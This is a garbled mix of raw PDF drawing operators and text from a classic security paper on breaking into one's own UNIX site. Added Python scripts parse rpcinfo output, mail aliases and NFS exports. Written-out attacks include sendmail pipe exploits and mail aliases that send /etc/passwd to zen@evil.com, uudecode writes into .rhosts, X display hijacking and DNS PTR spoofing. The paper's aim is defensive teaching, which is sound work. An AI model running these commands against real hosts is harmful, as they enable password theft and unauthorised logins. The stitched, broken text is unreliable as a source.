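    "nfs":       "NFS server: exported trees may be mountable remotely",
    "bootparam": "diskless clients served: BOOTPARAMPROC_WHOAMI leaks the NIS domainname",
    "rexd":      "remote execution with client-supplied identity; no host or password check",
    "rusersd":   "lists logged-in users to anyone who asks",
    "rstatd":    "exposes host statistics and uptime",
}

# One table row: program number, version, proto, port, optional service name.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s*(\S*)\s*$")


def parse_rpcinfo(text):
    """Parse the 'program vers proto port [name]' table printed by rpcinfo -p."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line, blank line, or the trimmed-output note
        prog, vers, proto, port, name = m.groups()
        services.append({"program": int(prog), "version": int(vers),
                         "proto": proto, "port": int(port), "name": name})
    return services


def assess(services):
    """Return (name, note) pairs for registered services the paper singles out."""
    findings = []
    for svc in services:
        note = RISK_NOTES.get(svc["name"])
        if note:
            findings.append((svc["name"], note))
    return findings


def is_nis_server(services):
    return any(s["name"] == "ypserv" for s in services)


# Constructed input: the trimmed rpcinfo listing for victim.com from the paper.
SAMPLE = """\
   program vers proto   port
    100004    2   tcp    673  ypserv
    100005    1   udp    721  mountd
    100003    2   udp   2049  nfs
    100026    1   udp    733  bootparam
    100017    1   tcp   1274  rexd
"""

if __name__ == "__main__":
    svcs = parse_rpcinfo(SAMPLE)
    print("NIS server:", is_nis_server(svcs))
    for name, note in assess(svcs):
        print(f"{name:10s} {note}")
```

Run against real output, the parser tolerates the extra columns and unnamed programs that different vendors' rpcinfo print, since only the first four numeric fields are required to match.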
0.5 0.5 0.5 rg
10 448 m
10 450 l
602 450 l
601 449 l
11 449 l
11 449 l
h
f
0.875 0.875 0.875 rg
602 450 m
602 448 l
10 448 l
11 449 l
601 449 l
601 449 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 428.97556 Tm
(NIS masters control the mail aliases for the NIS domain in question. Jus\
t like local mail alias files, you )Tj
T*
(can create a mail alias that will execute commands when mail is sent to \
it \(a once popular example of )Tj
T*
(this is the "decode" alias which uudecodes mail files sent to it.\) For \
instance, here you create an alias )Tj
T*
("foo", which mails the password file back to evil.com by simply mailing \
any message to it: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /)Tj
0 -1.2 TD
(etc/aliases)Tj
T*
( nis-master # cd /var/yp)Tj
T*
( nis-master # make aliases)Tj
T*
( nis-master # echo test | mail -v foo@victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Hopefully attackers won't have control of your NIS master host, but even\
more hopefully the lesson is )Tj
0 -1.2 TD
(clear -- NIS is normally insecure, but if an attacker has control of you\
r NIS master, then s/he effectively )Tj
T*
(has control of the client hosts \(e.g. can execute arbitrary commands\).\
)Tj
0 -2.55714 TD
(There aren't many effective defenses against NIS attacks; it is an insec\
ure service that has almost no )Tj
0 -1.2 TD
(authentication between clients and servers. To make things worse, it see\
ms fairly clear that arbitrary )Tj
T*
(maps can be forced onto even master servers \(e.g., it is possible to tr\
eat an NIS server as a client\). This, )Tj
T*
(obviously, would subvert the entire schema. If it is absolutely necessar\
y to use NIS, choosing a hard to )Tj
T*
(guess domainname can help slightly, but if you run diskless clients that\
are exposed to potential )Tj
T*
(attackers then it is trivial for an attacker to defeat this simple step \
by using the bootparam trick to get the )Tj
T*
(domainname. If NIS is used to propagate the password maps, then shadow p\
asswords do not give )Tj
T*
(additional protection because the shadow map is still accessible to any \
attacker that has root on an )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
145 0 obj 3456
endobj
146 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(attacking host. Better is to use NIS as little as possible, or to at lea\
st realize that the maps can be subject )Tj
0 -1.2 TD
(to perusal by potentially hostile forces. )Tj
0 -2.55714 TD
(Secure RPC goes a long way to diminish the threat, but it has its own pr\
oblems, primarily in that it is )Tj
0 -1.2 TD
(difficult to administer, but also in that the cryptographic methods used\
within are not very strong. It has )Tj
T*
(been rumored that NIS+, Sun's new network information service, fixes som\
e of these problems, but until )Tj
T*
(now it has been limited to running on Suns, and thus far has not lived u\
p to the promise of the design. )Tj
T*
(Finally, using packet filtering \(at the very least port 111\) or secure\
lib \(see appendix D\), or, for Suns, )Tj
T*
(applying Sun patch 100482-02 all can help. )Tj
ET
0.5 0.5 0.5 rg
10 584.59998 m
10 586.59998 l
602 586.59998 l
601 585.59998 l
11 585.59998 l
11 585.59998 l
h
f
0.875 0.875 0.875 rg
602 586.59998 m
602 584.59998 l
10 584.59998 l
11 585.59998 l
601 585.59998 l
601 585.59998 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 565.57556 Tm
(The portmapper only knows about RPC services. Other network services can\
be located with a brute-)Tj
T*
(force method that connects to all network ports. Many network utilities \
and windowing systems listen to )Tj
T*
(specific ports \(e.g. sendmail is on port 25, telnet is on port 23, X wi\
ndows is usually on port 6000, etc.\) )Tj
T*
(SATAN includes a program that scans the ports of a remote host and reports on its findings; if you run )Tj
T*
(it against our target, you see: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % tcpmap victim.com)Tj
0 -1.2 TD
( Mapping 128.128.128.1)Tj
T*
( port 21: ftp)Tj
T*
( port 23: telnet)Tj
T*
( port 25: smtp)Tj
T*
( port 37: time)Tj
T*
( port 79: finger)Tj
T*
( port 512: exec)Tj
T*
( port 513: login)Tj
T*
( port 514: shell)Tj
T*
( port 515: printer)Tj
T*
( port 6000: \(X\))Tj
/T1_0 1 Tf
0 -2.55232 TD
(This suggests that victim.com is running X windows. If not protected pro\
perly \(via the magic cookie or )Tj
0 -1.2 TD
(xhost mechanisms\), window displays can be captured or watched, user key\
strokes may be stolen, )Tj
T*
(programs executed remotely, etc. Also, if the target is running X and ac\
cepts a telnet to port 6000, that )Tj
T*
(can be used for a denial of service attack, as the target's windowing sy\
stem will often "freeze up" for a )Tj
T*
(short period of time. One method to determine the vulnerability of an X \
server is to connect to it via the )Tj
T*
(XOpenDisplay\(\) function; if the function returns NULL then you cannot \
access the victim's display )Tj
T*
(\(opendisplay is part of SATAN\): )Tj
/T1_1 1 Tf
0 -2.56195 TD
( char *hostname;)Tj
0 -2.39999 TD
( if \(XOpenDisplay\(hostname\) == NULL\) {)Tj
0 -1.2 TD
( printf\("Cannot open display: %s\\n", hostname\);)Tj
T*
( } else {)Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
147 0 obj 2225
endobj
148 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
0.5 0.5 0.5 rg
10 753.55385 m
10 755.55385 l
602 755.55385 l
601 754.55385 l
11 754.55385 l
11 754.55385 l
h
f
0.875 0.875 0.875 rg
602 755.55385 m
602 753.55385 l
10 753.55385 l
11 754.55385 l
601 754.55385 l
601 754.55385 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
19.38461 0 0 19.38461 10 710.56873 Tm
(Suggested reading:)Tj
/T1_2 1 Tf
14 0 0 14 10 673.26787 Tm
(Bellovin, Steve)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Security Problems in the TCP/IP Protocol Suite)Tj
/T1_0 1 Tf
(, Computer Communication Review 19 )Tj
0 -1.2 TD
(\(2\), 1989; a comment by Stephen Kent appears in volume 19 \(3\), 1989.\
)Tj
/T1_2 1 Tf
0 -2.55714 TD
(Garfinkel, Simson and Spafford, Gene)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Practical UNIX Security)Tj
/T1_0 1 Tf
(, O'Reilly and Associates, Inc., 1992. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Hess, David, Safford, David, and Pooch, Udo)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(A UNIX Network Protocol Study: Network Information )Tj
0 -1.2 TD
(Service)Tj
/T1_0 1 Tf
(, Computer Communication Review 22 \(5\) 1992. )Tj
/T1_3 1 Tf
0 -2.55714 TD
(Phreak Accident, Playing Hide and Seek, UNIX style)Tj
/T1_0 1 Tf
(, Phrack, Volume Four, Issue Forty-Three, File 14 )Tj
0 -1.2 TD
(of 27. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Ranum, Marcus)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Firewalls)Tj
/T1_0 1 Tf
( internet electronic mailing list, Sept 1993. )Tj
/T1_2 1 Tf
T*
(Schuba, Christoph)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Addressing Weaknesses in the Domain Name System Protocol)Tj
/T1_0 1 Tf
(, Purdue University, )Tj
0 -1.20001 TD
(August 1993. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Thompson, Ken)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Reflections on Trusting Trust)Tj
/T1_0 1 Tf
(, Communications of the ACM 27 \(8\),1984. )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
149 0 obj 3385
endobj
150 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 751.30817 Tm
( printf\("Can open display: %s\\n", hostname\);)Tj
0 -1.2 TD
( })Tj
0 -2.39999 TD
( evil % opendisplay victim.com:0)Tj
0 -1.2 TD
( Cannot open display: victim.com:0)Tj
/T1_0 1 Tf
0 -2.55232 TD
(X terminals, though much less powerful than a complete UNIX system, can \
have their own security )Tj
0 -1.2 TD
(problems. Many X terminals permit unrestricted rsh access, allowing you \
to start X client programs in )Tj
T*
(the victim's terminal with the output appearing on your own screen: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % xhost +xvictim.victim.com)Tj
0 -1.2 TD
( evil % rsh xvictim.victim.com telnet victim.com -display evil.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(In any case, give as much thought to your window security as your filesy\
stem and network utilities, for )Tj
0 -1.2 TD
(it can compromise your system as surely as a "+" in your hosts.equiv or \
a passwordless \(root\) account. )Tj
ET
0.5 0.5 0.5 rg
10 476.80002 m
10 478.80002 l
602 478.80002 l
601 477.80002 l
11 477.80002 l
11 477.80002 l
h
f
0.875 0.875 0.875 rg
602 478.80002 m
602 476.80002 l
10 476.80002 l
11 477.80002 l
601 477.80002 l
601 477.80002 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 457.77554 Tm
(Next, you examine sendmail. Sendmail is a very complex program that has \
a long history of security )Tj
T*
(problems, including the infamous "wiz" command \(hopefully long since di\
sabled on all machines\). You )Tj
T*
(can often determine the OS, sometimes down to the version number, of the\
target, by looking at the )Tj
T*
(version number returned by sendmail. This, in turn, can give you hints a\
s to how vulnerable it might be )Tj
T*
(to any of the numerous bugs. In addition, you can see if they run the "d\
ecode" alias, which has its own )Tj
T*
(set of problems: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % telnet victim.com 25)Tj
0 -1.2 TD
( connecting to host victim.com \(128.128.128.1.\), port 25)Tj
T*
( connection open)Tj
T*
( 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 )Tj
T*
(18:00 PDT)Tj
T*
( expn decode)Tj
T*
( 250 <"|/usr/bin/uudecode">)Tj
T*
( quit)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Running the "decode" alias is a security risk -- it allows potential att\
ackers to overwrite any file that is )Tj
0 -1.2 TD
(writable by the owner of that alias -- often daemon, but potentially any\
user. Consider this piece of mail )Tj
T*
(-- this will place "evil.com" in user zen's .rhosts file if it is writab\
le: )Tj
/T1_1 1 Tf
0 -2.56195 TD
( evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail )Tj
0 -1.2 TD
(decode@victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(If no home directories are known or writable, an interesting variation o\
f this is to create a bogus /etc/)Tj
0 -1.2 TD
(aliases.pag file that contains an alias with a command you wish to execu\
te on your target. This may )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
151 0 obj 3221
endobj
152 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(work since on many systems the aliases.pag and aliases.dir files, which \
control the system's mail aliases, )Tj
0 -1.2 TD
(are writable to the world. )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % cat decode)Tj
0 -1.2 TD
( bin: "| cat /etc/passwd | mail zen@evil.com")Tj
T*
( evil % newaliases -oQ/tmp -oA`pwd`/decode)Tj
T*
( evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com)Tj
T*
( evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null)Tj
/T1_0 1 Tf
0 -2.55232 TD
(A lot of things can be found out by just asking sendmail if an address i\
s acceptable \(vrfy\), or what an )Tj
0 -1.2 TD
(address expands to \(expn\). When the finger or rusers services are turn\
ed off, vrfy and expn can still be )Tj
T*
(used to identify user accounts or targets. Vrfy and expn can also be use\
d to find out if the user is piping )Tj
T*
(mail through any program that might be exploited \(e.g. vacation, mail s\
orters, etc.\). It can be a good idea )Tj
T*
(to disable the vrfy and expn commands: in most versions, look at the sou\
rce file srvrsmtp.c, and either )Tj
T*
(delete or change the two lines in the CmdTab structure that have the str\
ings "vrfy" and "expn". Sites )Tj
T*
(without source can still disable expn and vrfy by just editing the sendm\
ail executable with a binary )Tj
T*
(editor and replacing "vrfy" and "expn" with blanks. Acquiring a recent v\
ersion of sendmail \(see )Tj
T*
(Appendix D\) is also an extremely good idea, since there have probably b\
een more security bugs reported )Tj
T*
(in sendmail than in any other UNIX program. )Tj
ET
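An administrator can run the same check locally instead of waiting for an attacker to expn it. The following Python is an added example (not part of the paper or of sendmail) that parses an aliases file in the format sendmail reads (name: target, target; # comments; continuation lines that start with whitespace) and reports every alias that delivers to a program or a file, the "decode" alias and the paper's "foo" alias included. The sample aliases file is constructed for the example.

```python
def parse_aliases(text):
    """Parse a sendmail-style aliases file into {name: [targets]}.
    Handles '#' comments and continuation lines that begin with whitespace."""
    logical = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and logical:
            logical[-1] += " " + raw.strip()   # continuation of previous entry
        else:
            logical.append(raw.strip())
    aliases = {}
    for entry in logical:
        name, sep, rest = entry.partition(":")
        if not sep:
            continue                            # not an alias line
        aliases[name.strip().lower()] = split_targets(rest)
    return aliases


def split_targets(rest):
    """Split the right-hand side on commas, honouring double quotes so that
    '"| mail zen@evil.com < /etc/passwd "' stays one target."""
    targets, buf, quoted = [], [], False
    for ch in rest:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            targets.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    if buf:
        targets.append("".join(buf).strip())
    return [t.strip('"').strip() for t in targets if t.strip()]


def classify(target):
    """sendmail delivery kinds: program pipe, file append, :include: list, address."""
    if target.startswith("|"):
        return "program"
    if target.startswith("/"):
        return "file"
    if target.lower().startswith(":include:"):
        return "include"
    return "address"


def risky_aliases(aliases):
    """Every alias that delivers to a program or a file. Anyone who can send
    mail to the alias gets that command run, or that file appended to, as the
    mailer's user, so each one is worth a deliberate decision."""
    out = []
    for name, targets in aliases.items():
        for t in targets:
            kind = classify(t)
            if kind in ("program", "file"):
                out.append((name, kind, t))
    return out


# Constructed sample aliases file for the example.
SAMPLE = """\
# constructed sample /etc/aliases
postmaster: root
decode: "|/usr/bin/uudecode"
foo: "| mail zen@evil.com < /etc/passwd "
staff: alice, bob,
        carol
logmail: /var/log/mail.archive
nobody: /dev/null
"""

if __name__ == "__main__":
    for name, kind, target in risky_aliases(parse_aliases(SAMPLE)):
        print(f"{name:10s} {kind:8s} {target}")
```

Anything this reports is also what `expn` would reveal to a remote caller, so the list doubles as a preview of what an attacker learns from the SMTP port even after finger is switched off.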
0.5 0.5 0.5 rg
10 414.39999 m
10 416.39999 l
602 416.39999 l
601 415.39999 l
11 415.39999 l
11 415.39999 l
h
f
0.875 0.875 0.875 rg
602 416.39999 m
602 414.39999 l
10 414.39999 l
11 415.39999 l
601 415.39999 l
601 415.39999 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 395.37555 Tm
(As a sendmail send-off, there are two fairly well known bugs that should be checked for. The first was )Tj
T*
(definitely fixed in version 5.59 from Berkeley; in versions of sendmail previous to 5.59, the "evil.com" )Tj
T*
(gets appended to the file specified, along with all of the typical mail headers, despite the error )Tj
T*
(messages shown below: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( % cat evil_sendmail)Tj
0 -1.2 TD
( telnet victim.com 25 << EOSM)Tj
T*
( rcpt to: /home/zen/.rhosts)Tj
T*
( mail from: zen)Tj
T*
( data)Tj
T*
( random garbage)Tj
T*
( .)Tj
T*
( rcpt to: /home/zen/.rhosts)Tj
T*
( mail from: zen)Tj
T*
( data)Tj
T*
( evil.com)Tj
T*
( .)Tj
T*
( quit)Tj
T*
( EOSM)Tj
0 -2.39999 TD
( evil % /bin/sh evil_sendmail)Tj
0 -1.2 TD
( Trying 128.128.128.1)Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
153 0 obj 2990
endobj
154 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.50812 Tm
( Connected to victim.com)Tj
0 -1.2 TD
( Escape character is '^]'.)Tj
T*
( Connection closed by foreign host.)Tj
0 -2.39999 TD
( evil % rlogin victim.com -l zen)Tj
0 -1.2 TD
( Welcome to victim.com!)Tj
T*
( victim %)Tj
/T1_0 1 Tf
0 -2.55232 TD
(The second hole, fixed only recently, permitted anyone to specify arbitr\
ary shell commands and/or )Tj
0 -1.2 TD
(pathnames for the sender and/or destination address. Attempts to keep de\
tails secret were in vain, and )Tj
T*
(extensive discussions in mailing lists and usenet news groups led to dis\
closure of how to exploit some )Tj
T*
(versions of the bug. As with many UNIX bugs, nearly every vendor's sendm\
ail was vulnerable to the )Tj
T*
(problem, since they all share a common source code tree ancestry. Space \
precludes us from discussing it )Tj
T*
(fully, but a typical attack to get the password file might look like thi\
s: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % telnet victim.com 25)Tj
0 -1.2 TD
( Trying 128.128.128.1...)Tj
T*
( Connected to victim.com)Tj
T*
( Escape character is '^]'.)Tj
T*
( 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04)Tj
T*
( mail from: "|/bin/mail zen@evil.com < /etc/passwd")Tj
T*
( 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok)Tj
T*
( rcpt to: nosuchuser)Tj
T*
( 550 nosuchuser... User unknown)Tj
T*
( data)Tj
T*
( 354 Enter mail, end with "." on a line by itself)Tj
T*
( .)Tj
T*
( 250 Mail accepted)Tj
T*
( quit)Tj
T*
( Connection closed by foreign host.)Tj
T*
( evil %)Tj
/T1_0 1 Tf
0 -2.55232 TD
(At the time of writing, version 8.6.4 of sendmail \(see Appendix D for i\
nformation on how to get this\) is )Tj
0 -1.2 TD
(reportedly the only variant of sendmail with all of the recent security \
bugs fixed. )Tj
/T1_2 1 Tf
19.38461 0 0 19.38461 10 151.81488 Tm
(Trust)Tj
/T1_0 1 Tf
14 0 0 14 10 114.51402 Tm
(For our final topic of vulnerability, we'll digress from the practical s\
trategy we've followed previously to )Tj
T*
(go a bit more into the theoretical side, and briefly discuss the notion \
of trust. The issues and implications )Tj
T*
(of vulnerabilities here are a bit more subtle and far-reaching than what\
we've covered before; in the )Tj
T*
(context of this paper we use the word trust whenever there is a situatio\
n when a server \(note that any )Tj
T*
(host that allows remote access can be called a server\) can permit a loc\
al resource to be used by a client )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
155 0 obj 3987
endobj
156 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(without password authentication when password authentication is normally\
required. In other words, we )Tj
0 -1.2 TD
(arbitrarily limit the discussion to clients in disguise. )Tj
0 -2.55714 TD
(There are many ways that a host can trust: .rhosts and hosts.equiv files\
that allow access without )Tj
0 -1.2 TD
(password verification; window servers that allow remote systems to use a\
nd abuse privileges; export )Tj
T*
(files that control access via NFS, and more. )Tj
0 -2.55714 TD
(Nearly all of these rely on client IP address to hostname conversion to \
determine whether or not service )Tj
0 -1.2 TD
(is to be granted. The simplest method uses the /etc/hosts file for a dir\
ect lookup. However, today most )Tj
T*
(hosts use either DNS \(the Domain Name Service\), NIS, or both for name \
lookup service. A reverse )Tj
T*
(lookup occurs when a server has an IP address \(from a client host conne\
cting to it\) and wishes to get the )Tj
T*
(corresponding client hostname. )Tj
0 -2.55714 TD
(Although the concept of how host trust works is well understood by most \
system administrators, the )Tj
0 -1.2 TD
(_dangers_ of trust, and the _practical_ problem it represents, irrespective of hostname impersonation, are )Tj
T*
(among the least understood problems we know of on the Internet. This goes far beyond the obvious hosts.)Tj
T*
(equiv and rhosts files; NFS, NIS, windowing systems -- indeed, many of the useful services in UNIX are )Tj
T*
(based on the concept that well known \(to an administrator or user\) sit\
es are trusted in some way. What is )Tj
T*
(not understood is how networking so tightly binds security between what \
are normally considered )Tj
T*
(disjoint hosts. )Tj
0 -2.55714 TD
(Any form of trust can be spoofed, fooled, or subverted, especially when \
the authority that gets queried to )Tj
0 -1.2 TD
(check the credentials of the client is either outside of the server's ad\
ministrative domain, or when the )Tj
T*
(trust mechanism is based on something that has a weak form of authentica\
tion; both are usually the case. )Tj
0 -2.55714 TD
(Obviously, if the host containing the database \(either NIS, DNS, or wha\
tever\) has been compromised, )Tj
0 -1.2 TD
(the intruder can convince the target host that s/he is coming from any t\
rusted host; it is now sufficient to )Tj
T*
(find out which hosts are trusted by the target. This task is often great\
ly helped by examining where )Tj
T*
(system administrators and system accounts \(such as root, etc.\) last lo\
gged in from. Going back to our )Tj
T*
(target, victim.com, you note that root and some other system accounts lo\
gged in from big.victim.com. )Tj
T*
(You change the PTR record for evil.com so that when you attempt to rlogi\
n in from evil.com to victim.)Tj
T*
(com, victim.com will attempt to look up your hostname and will find what\
you placed in the record. If )Tj
T*
(the record in the DNS database looks like: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( 1.192.192.192.in-addr.arpa IN PTR evil.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(And you change it to: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( 1.192.192.192.in-addr.arpa IN PTR big.victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(then, depending on how naive victim.com's system software is, victim.com\
will believe the login comes )Tj
0 -1.2 TD
(from big.victim.com, and, assuming that big.victim.com is in the /etc/ho\
sts.equiv or /.rhosts files, you )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
157 0 obj 4886
endobj
158 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(will be able to login without supplying a password. With NIS, it is a si\
mple matter of either editing the )Tj
0 -1.2 TD
(host database on the NIS master \(if this is controlled by the intruder\)\
or of spoofing or forcing NIS \(see )Tj
T*
(discussion on NIS security above\) to supply the target with whatever in\
formation you desire. Although )Tj
T*
(more complex, interesting, and damaging attacks can be mounted via DNS, \
time and space don't allow )Tj
T*
(coverage of these methods here. )Tj
0 -2.55714 TD
(Two methods can be used to prevent such attacks. The first is the most d\
irect, but perhaps the most )Tj
0 -1.2 TD
(impractical. If your site doesn't use any trust, you won't be as vulnera\
ble to host spoofing. The other )Tj
T*
(strategy is to use cryptographic protocols. Using the secure RPC protoco\
l \(used in secure NFS, NIS+, )Tj
T*
(etc.\) is one method; although it has been "broken" cryptographically, i\
t still provides better assurance )Tj
T*
(than RPC authentication schemes that do not use any form of encryption. \
Other solutions, both hardware )Tj
T*
(\(smartcards\) and software \(Kerberos\), are being developed, but they \
are either incomplete or require )Tj
T*
(changes to system software. )Tj
0 -2.55714 TD
(Appendix B details the results of an informal survey taken from a variet\
y of hosts on the Internet. )Tj
/T1_1 1 Tf
19.38461 0 0 19.38461 10 473.61487 Tm
(Protecting the system)Tj
/T1_0 1 Tf
14 0 0 14 10 436.314 Tm
(It is our hope that we have demonstrated that even some of the most seem\
ingly innocuous services run )Tj
0 -1.2 TD
(can offer \(sometimes unexpectedly\) ammunition to determined system cra\
ckers. But, of course, if )Tj
T*
(security were all that mattered, computers would never be turned on, let\
alone hooked into a network )Tj
T*
(with literally millions of potential intruders. Rather than reiterating \
specific advice on what to switch on )Tj
T*
(or off, we instead offer some general suggestions: )Tj
/T1_2 1 Tf
7 0 0 7 35.713 333.314 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 333.314 Tm
(If you cannot turn off the finger service, consider installing a modifie\
d finger daemon. It is rarely )Tj
T*
(necessary to reveal a user's home directory and the source of last login\
. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 299.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 299.71402 Tm
(Don't run NIS unless it's absolutely necessary. Use NFS as little as pos\
sible. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 282.914 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 282.914 Tm
(Never export NFS filesystems unrestricted to the world. Try to export fi\
le systems read-only )Tj
T*
(where possible. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 249.31401 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 249.31401 Tm
(Fortify and protect servers \(e.g. hosts that provide a service to other\
hosts -- NFS, NIS, DNS, )Tj
T*
(whatever.\) Only allow administrative accounts on these hosts. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 215.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 215.71402 Tm
(Examine carefully services offered by inetd and the portmapper. Eliminat\
e any that aren't )Tj
T*
(explicitly needed. Use Wietse Venema's inetd wrappers, if for no other r\
eason than to log the )Tj
T*
(sources of connections to your host. This adds immeasurably to the stand\
ard UNIX auditing )Tj
T*
(features, especially with respect to network attacks. If possible, use t\
he loghost mechanism of )Tj
T*
(syslog to collect security-related information on a secure host. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 131.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 131.71402 Tm
(Eliminate trust unless there is an absolute need for it. Trust is your e\
nemy. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 114.91402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 114.91402 Tm
(Use shadow passwords and a passwd command that disallows poor passwords.\
Disable or delete )Tj
T*
(unused/dormant system or user accounts. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 81.31401 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 81.31401 Tm
(Keep abreast of current literature \(see our suggested reading list and \
bibliography at the end of )Tj
T*
(this paper\) and security tools; communicate to others about security pr\
oblems and incidents. At )Tj
T*
(minimum, subscribe to the CERT mailing list and phrack magazine \(plus t\
he firewalls mailing )Tj
ET
EMC
/Artifact <>BDC
Q
EMC
endstream
endobj
159 0 obj 4424
endobj
160 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 50 753.97552 Tm
(list, if your site is using or thinking about installing a firewall\) an\
d read the usenet security )Tj
0 -1.2 TD
(newsgroups to get the latest information on security problems. Ignorance\
is the deadliest security )Tj
T*
(problem we are aware of. )Tj
/T1_1 1 Tf
7 0 0 7 35.713 703.57556 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 703.57556 Tm
(Install all vendor security patches as soon as possible, on all of your \
hosts. Examine security )Tj
T*
(patch information for other vendors - many bugs \(rdist, sendmail\) are \
common to many UNIX )Tj
T*
(variants. )Tj
-2.85715 -2.55714 Td
(It is interesting to note that common solutions to security problems suc\
h as running Kerberos or using )Tj
T*
(one-time passwords or digital tokens are ineffective against most of the\
attacks we discuss here. We )Tj
T*
(heartily recommend the use of such systems, but be aware that they are _\
not_ a total security solution -- )Tj
T*
(they are part of a larger struggle to defend your system. )Tj
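The recommendations above about NFS exports, inetd services and Wietse Venema's wrappers can be checked mechanically. The script below is an added example, not part of the paper or of SATAN: it parses an /etc/exports file in Linux nfs-utils syntax and a classic inetd.conf, flags world-visible or read-write exports and exports that leave remote root unsquashed, and lists every enabled inetd service that is not on the administrator's list of needed services or is not started through the tcpd wrapper (so connection sources are not logged). The sample files, host names and the /usr/sbin/tcpd path are constructed assumptions for the example.

```python
import re

# Constructed sample files (not from any real host), in Linux nfs-utils
# /etc/exports syntax and classic inetd.conf syntax.
SAMPLE_EXPORTS = """\
# /etc/exports -- constructed example
/home           *(rw,no_root_squash)
/export/tools   10.1.0.0/24(ro) build1.example.com(rw)
/export/pub     (ro)
/export/scratch
/var/www        web1.example.com(ro,sync)
"""

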